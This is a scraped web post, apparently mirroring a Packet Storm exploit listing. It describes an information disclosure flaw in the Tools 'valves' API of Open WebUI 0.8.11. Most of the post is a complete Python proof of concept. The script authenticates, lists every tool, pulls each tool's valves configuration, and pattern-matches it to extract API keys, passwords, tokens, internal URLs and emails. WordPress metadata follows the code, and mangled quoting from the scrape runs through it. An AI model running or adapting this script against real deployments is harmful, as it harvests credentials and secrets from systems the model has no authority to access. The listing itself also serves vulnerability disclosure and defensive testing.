{“lastseen”:”2026-04-24T20:44:19″,”description”:”A potential access control issue was identified in Open WebUI where the Tools API and associated \u201cvalves\u201d endpoints may expose sensitive configuration data when accessed with valid authentication tokens. The affected endpoints allow retrieval of tool…”,”published”:”2026-04-24T00:00:00″,”modified”:”2026-04-24T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Open WebUI 0.8.11 Information Disclosure”,”source”:””,”references”:””,”id”:”PACKETSTORM:219780″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”==================================================================================================================================\\n | # Title : Open WebUI 0.8.11 Improper Access Control in Tools Valves API Leads to Exposure of Sensitive Configuration Data |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.4 (64 bits) |\\n | # Vendor : https:\/\/github.com\/open-webui\/open-webui |\\n ==================================================================================================================================\\n \\n [+] Summary : A potential access control issue was identified in Open WebUI where the Tools API and associated \u201cvalves\u201d endpoints may expose sensitive configuration data when accessed with valid authentication tokens. \\n The affected endpoints allow retrieval of tool metadata and configuration structures that may include secrets such as API keys, passwords, tokens, endpoints, and internal service URLs.\\n \\n [+] POC : \\n \\n #!\/usr\/bin\/env python3\\n \\n import requests\\n import json\\n import sys\\n import argparse\\n from typing import Dict, List, Optional\\n from urllib.parse import urljoin\\n \\n \\n class OpenWebUIExploit:\\n def __init__(self, base_url: str, token: str, verbose: bool = False):\\n self.base_url = base_url.rstrip(‘\/’)\\n self.token = token\\n self.verbose = verbose\\n self.session = requests.Session()\\n self.session.headers.update({\\n ‘Authorization’: f’Bearer {token}’,\\n ‘Content-Type’: ‘application\/json’\\n })\\n \\n def log(self, message: str, level: str = \\”INFO\\”):\\n if not self.verbose and level == \\”DEBUG\\”:\\n return\\n \\n colors = {\\n \\”INFO\\”: \\”\\\\033[94m\\”,\\n \\”SUCCESS\\”: \\”\\\\033[92m\\”,\\n \\”ERROR\\”: \\”\\\\033[91m\\”,\\n \\”WARNING\\”: \\”\\\\033[93m\\”,\\n \\”DEBUG\\”: \\”\\\\033[90m\\”\\n }\\n print(f\\”{colors.get(level, ”)}[{level}] {message}\\\\033[0m\\”)\\n \\n def get_all_tools(self) -\\u003e List[Dict]:\\n try:\\n url = urljoin(self.base_url, ‘\/api\/v1\/tools\/’)\\n response = self.session.get(url)\\n \\n if response.status_code == 200:\\n try:\\n tools = response.json()\\n if isinstance(tools, dict):\\n tools = tools.get(\\”data\\”, [])\\n self.log(f\\”Found {len(tools)} tools\\”, \\”SUCCESS\\”)\\n return tools\\n except:\\n self.log(\\”Invalid JSON response\\”, \\”ERROR\\”)\\n return []\\n else:\\n self.log(f\\”Failed to get tools: {response.status_code}\\”, \\”ERROR\\”)\\n return []\\n except Exception as e:\\n self.log(f\\”Error getting tools: {e}\\”, \\”ERROR\\”)\\n return []\\n \\n def get_tool_valves(self, tool_id: str) -\\u003e Optional[Dict]:\\n try:\\n url = urljoin(self.base_url, f’\/api\/v1\/tools\/id\/{tool_id}\/valves’)\\n response = self.session.get(url)\\n \\n if response.status_code == 200:\\n try:\\n valves = response.json()\\n self.log(f\\”Extracted valves for: {tool_id}\\”, \\”SUCCESS\\”)\\n return valves\\n except:\\n self.log(\\”Invalid valves JSON\\”, \\”ERROR\\”)\\n return None\\n \\n elif response.status_code == 404:\\n self.log(f\\”Tool not found: {tool_id}\\”, \\”WARNING\\”)\\n return None\\n \\n else:\\n self.log(f\\”Failed valves request: {response.status_code}\\”, \\”ERROR\\”)\\n return None\\n \\n except Exception as e:\\n self.log(f\\”Error getting valves: {e}\\”, \\”ERROR\\”)\\n return None\\n \\n def extract_sensitive_data(self, valves: Dict) -\\u003e Dict:\\n sensitive = {\\n \\”api_keys\\”: [],\\n \\”passwords\\”: [],\\n \\”tokens\\”: [],\\n \\”secrets\\”: [],\\n \\”urls\\”: [],\\n \\”emails\\”: []\\n }\\n \\n api_key_patterns = [‘api_key’, ‘apikey’, ‘api-key’, ‘apiKey’]\\n password_patterns = [‘password’, ‘pass’, ‘pwd’, ‘secret’]\\n url_patterns = [‘url’, ‘endpoint’, ‘host’, ‘server’]\\n email_patterns = [’email’, ‘user’]\\n \\n def scan_value(key: str, value, depth=0):\\n if depth \\u003e 10:\\n return\\n \\n key_lower = str(key).lower()\\n \\n if isinstance(value, str):\\n \\n if any(p in key_lower for p in api_key_patterns):\\n sensitive[\\”api_keys\\”].append({key: value})\\n if any(p in key_lower for p in password_patterns):\\n sensitive[\\”passwords\\”].append({key: value})\\n if any(p in key_lower for p in url_patterns) and \\”http\\” in value:\\n sensitive[\\”urls\\”].append({key: value})\\n if any(p in key_lower for p in email_patterns) and \\”@\\” in value:\\n sensitive[\\”emails\\”].append({key: value})\\n \\n elif isinstance(value, dict):\\n for k, v in value.items():\\n scan_value(k, v, depth + 1)\\n \\n elif isinstance(value, list):\\n for i, item in enumerate(value):\\n scan_value(str(i), item, depth + 1)\\n \\n for k, v in valves.items():\\n scan_value(k, v)\\n \\n return sensitive\\n \\n def exploit(self, tool_id: Optional[str] = None) -\\u003e Dict:\\n results = {\\n \\”success\\”: False,\\n \\”tools_examined\\”: [],\\n \\”sensitive_data\\”: []\\n }\\n \\n if tool_id:\\n valves = self.get_tool_valves(tool_id)\\n \\n if valves:\\n sensitive = self.extract_sensitive_data(valves)\\n \\n results[\\”tools_examined\\”].append(tool_id)\\n results[\\”sensitive_data\\”].append({\\n \\”tool_id\\”: tool_id,\\n \\”valves\\”: valves,\\n \\”sensitive\\”: sensitive\\n })\\n if any(sensitive.values()):\\n results[\\”success\\”] = True\\n \\n else:\\n tools = self.get_all_tools()\\n \\n if not tools:\\n self.log(\\”No tools found\\”, \\”WARNING\\”)\\n return results\\n \\n for tool in tools:\\n tool_id = tool.get(‘id’)\\n tool_name = tool.get(‘name’, ‘Unknown’)\\n \\n if not tool_id:\\n continue\\n \\n valves = self.get_tool_valves(tool_id)\\n \\n if not valves:\\n continue\\n \\n sensitive = self.extract_sensitive_data(valves)\\n \\n results[\\”tools_examined\\”].append(tool_id)\\n results[\\”sensitive_data\\”].append({\\n \\”tool_id\\”: tool_id,\\n \\”tool_name\\”: tool_name,\\n \\”valves\\”: valves,\\n \\”sensitive\\”: sensitive\\n })\\n \\n if any(sensitive.values()):\\n results[\\”success\\”] = True\\n self.log(f\\”Sensitive data found in {tool_name}\\”, \\”WARNING\\”)\\n \\n return results\\n \\n \\n def print_results(results: Dict):\\n print(\\”\\\\n\\” + \\”=\\” * 70)\\n print(\\”RESULTS\\”)\\n print(\\”=\\” * 70)\\n \\n if not results[\\”success\\”]:\\n print(\\”\\\\n[-] No sensitive data found\\”)\\n return\\n \\n for item in results[\\”sensitive_data\\”]:\\n print(\\”\\\\n\\” + \\”-\\” * 50)\\n print(f\\”Tool: {item.get(‘tool_name’, item.get(‘tool_id’))}\\”)\\n \\n sensitive = item.get(\\”sensitive\\”, {})\\n \\n for key, values in sensitive.items():\\n if values:\\n print(f\\”\\\\n[!] {key.upper()}:\\”)\\n for v in values:\\n print(f\\” {v}\\”)\\n \\n print(\\”\\\\n\\” + \\”=\\” * 70)\\n \\n \\n def get_token_from_login(base_url: str, email: str, password: str) -\\u003e Optional[str]:\\n try:\\n url = urljoin(base_url, ‘\/api\/v1\/auths\/signin’)\\n r = requests.post(url, json={\\”email\\”: email, \\”password\\”: password})\\n \\n if r.status_code == 200:\\n return r.json().get(\\”token\\”)\\n \\n except:\\n pass\\n \\n return None\\n \\n \\n def main():\\n parser = argparse.ArgumentParser()\\n parser.add_argument(‘-u’, ‘–url’, required=True)\\n parser.add_argument(‘-t’, ‘–token’)\\n parser.add_argument(‘-e’, ‘–email’)\\n parser.add_argument(‘-p’, ‘–password’)\\n parser.add_argument(‘-i’, ‘–tool-id’)\\n parser.add_argument(‘-v’, ‘–verbose’, action=’store_true’)\\n \\n args = parser.parse_args()\\n \\n token = args.token\\n \\n if not token and args.email and args.password:\\n token = get_token_from_login(args.url, args.email, args.password)\\n \\n if not token:\\n print(\\”[-] No token provided\\”)\\n sys.exit(1)\\n \\n exploit = OpenWebUIExploit(args.url, token, args.verbose)\\n results = exploit.exploit(args.tool_id)\\n \\n print_results(results)\\n \\n \\n if __name__ == \\”__main__\\”:\\n main()\\n \\t\\n Greetings to :==============================================================================\\n jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\\n ============================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/219780″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/219780\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-04-24T20:44:19″,”description”:”A potential access control issue was identified in Open WebUI where the Tools API and associated \u201cvalves\u201d endpoints may expose sensitive configuration data when accessed…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-49296","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n